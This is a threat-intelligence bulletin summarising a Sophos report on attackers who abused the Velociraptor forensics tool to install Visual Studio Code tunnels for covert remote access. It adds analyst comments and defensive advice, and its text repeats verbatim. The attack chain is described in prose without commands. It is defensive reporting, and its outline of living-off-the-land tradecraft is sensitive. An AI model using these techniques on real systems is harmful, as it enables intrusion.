Velociraptor Incident Response Tool Abused for Remote Access
Summary:
In August 2025, researchers from Sophos analyzed an intrusion where attackers deployed the legitimate open-source Velociraptor digital forensics and incident response tool. Instead of using it for defense, the attackers abused Velociraptor to download and run Visual Studio Code with the tunneling feature enabled, likely to create a connection back to their command-and-control server. This activity raised a Taegis alert because Visual Studio Code tunnels can grant remote access and remote code execution, a technique previously exploited by multiple threat groups. The attackers retrieved Velociraptor via the Windows msiexec utility from a Cloudflare Workers domain that also hosted other malicious tools such as Cloudflare Tunnel and Radmin. Once installed, Velociraptor communicated with a C2 server. Through an encoded PowerShell command, the threat actor then downloaded Visual Studio Code from the same staging domain and executed it with tunneling enabled, installing it as a service and logging its output. The actor later used msiexec again to pull down additional malware from the same infrastructure.
The attempted tunneling was detected in time, prompting a Sophos investigation. The compromised host was quickly isolated, which disrupted the attacker’s operation before they could escalate to ransomware deployment.
Security Officer Comments:
This intrusion highlights a growing trend where attackers repurpose legitimate security and administration tools for malicious objectives. By abusing Velociraptor and Visual Studio Code’s tunneling feature, the threat actor attempted to establish covert access while minimizing reliance on traditional malware, which would normally trigger faster detection. The use of Cloudflare Workers for staging tools also reflects an effort to blend malicious traffic with legitimate cloud services, complicating attribution and detection.
Suggested Corrections:
Defenders are advised to monitor for unexpected installations of such tools, investigate suspicious tunneling or PowerShell execution, and maintain strong endpoint detection and response capabilities. Proactive detection and swift remediation can significantly reduce the impact of these attacks.
Link(s):
https://news.sophos.com/en-us/2025/...ident-response-tool-abused-for-remote-access/
In August 2025, researchers from Sophos analyzed an intrusion where attackers deployed the legitimate open-source Velociraptor digital forensics and incident response tool. Instead of using it for defense, the attackers abused Velociraptor to download and run Visual Studio Code with the tunneling feature enabled, likely to create a connection back to their command-and-control server. This activity raised a Taegis alert because Visual Studio Code tunnels can grant remote access and remote code execution, a technique previously exploited by multiple threat groups. The attackers retrieved Velociraptor via the Windows msiexec utility from a Cloudflare Workers domain that also hosted other malicious tools such as Cloudflare Tunnel and Radmin. Once installed, Velociraptor communicated with a C2 server. Through an encoded PowerShell command, the threat actor then downloaded Visual Studio Code from the same staging domain and executed it with tunneling enabled, installing it as a service and logging its output. The actor later used msiexec again to pull down additional malware from the same infrastructure.
The attempted tunneling was detected in time, prompting a Sophos investigation. The compromised host was quickly isolated, which disrupted the attacker’s operation before they could escalate to ransomware deployment.
Security Officer Comments:
This intrusion highlights a growing trend where attackers repurpose legitimate security and administration tools for malicious objectives. By abusing Velociraptor and Visual Studio Code’s tunneling feature, the threat actor attempted to establish covert access while minimizing reliance on traditional malware, which would normally trigger faster detection. The use of Cloudflare Workers for staging tools also reflects an effort to blend malicious traffic with legitimate cloud services, complicating attribution and detection.
Suggested Corrections:
Defenders are advised to monitor for unexpected installations of such tools, investigate suspicious tunneling or PowerShell execution, and maintain strong endpoint detection and response capabilities. Proactive detection and swift remediation can significantly reduce the impact of these attacks.
Link(s):
https://news.sophos.com/en-us/2025/...ident-response-tool-abused-for-remote-access/